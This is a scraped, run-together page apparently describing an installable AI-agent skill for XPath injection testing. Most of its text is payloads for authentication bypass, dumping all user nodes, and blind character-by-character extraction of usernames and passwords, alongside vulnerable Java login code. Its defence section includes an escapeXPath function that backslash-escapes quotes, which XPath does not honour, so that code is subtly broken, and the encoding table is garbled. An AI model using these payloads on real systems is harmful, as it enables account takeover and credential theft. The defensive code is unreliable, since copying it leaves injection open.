Loading...
Loading...
Professional Skills and Methodologies for XPath Injection Vulnerability Testing
npx skill4agent add ed1s0nz/cyberstrikeai xpath-injection-testingString xpath = "//user[username='" + username + "' and password='" + password + "']";
XPathExpression expr = xpath.compile(xpath);
NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);//user[username='admin']
//user[@id='1']
//user[username='admin' and password='pass']
//user[username='admin' or username='user']text()count()substring()string-length()contains()' or '1'='1
' or '1'='1' or '
' or 1=1 or '
') or ('1'='1' or '1'='1
' and '1'='2
' or 1=1 or 'Username: admin' or '1'='1
Password: anything
Query: //user[username='admin' or '1'='1' and password='anything']Username: admin') or ('1'='1
Query: //user[username='admin') or ('1'='1' and password='*']' or 1=1 or '
' or '1'='1
') or 1=1 or ('' or count(//user)>0 or '' or substring(//user[1]/username,1,1)='a' or 'Input: admin' or '1'='1
Query: //user[username='admin' or '1'='1' and password='*']
Result: Matches all usersInput: admin')] | //* | //*[('
Query: //user[username='admin')] | //* | //*[('' and password='*']' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,1,1)='b' or '' or 1=1 or '
Result: Returns all user nodes' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,2,1)='d' or '
Retrieve each character step by step' or substring(//user[1]/password,1,1)='p' or '
Retrieve password characters step by step' or count(//user[substring(username,1,1)='a'])>0 and sleep(5) or '' or substring(//user[1]/username,1,1)='a' or '
Observe response differences' or '1'='1 → %27%20or%20%271%27%3D%271' → '
" → "
< → <
> → >' or 1=1 or '
' or '1'='1' or 'substring(//user[1]/username,1,1)
substring(//user[position()=1]/username,1,1)
//user[1]/username/text()[1]from lxml import etree
from lxml.etree import XPath
# Load XML document
doc = etree.parse('users.xml')
# Test injection
xpath_expr = "//user[username='admin' or '1'='1']"
xpath = XPath(xpath_expr)
results = xpath(doc)
print(results)private static final String[] XPATH_ESCAPE_CHARS =
{"'", "\"", "[", "]", "(", ")", "=", ">", "<", " "};
public static String escapeXPath(String input) {
if (input == null) {
return null;
}
StringBuilder sb = new StringBuilder();
for (int i = 0; i < input.length(); i++) {
char c = input.charAt(i);
if (Arrays.asList(XPATH_ESCAPE_CHARS).contains(String.valueOf(c))) {
sb.append("\\");
}
sb.append(c);
}
return sb.toString();
}// Use XPath variables
String xpath = "//user[username=$username and password=$password]";
XPathExpression expr = xpath.compile(xpath);
XPathVariableResolver resolver = new MapVariableResolver(
Map.of("username", escapedUsername, "password", escapedPassword));
expr.setXPathVariableResolver(resolver);// Only allow specific characters
if (!input.matches("^[a-zA-Z0-9@._-]+$")) {
throw new IllegalArgumentException("Invalid input");
}// Predefined query template
private static final String LOGIN_QUERY =
"//user[username=$1 and password=$2]";
// Use parameter binding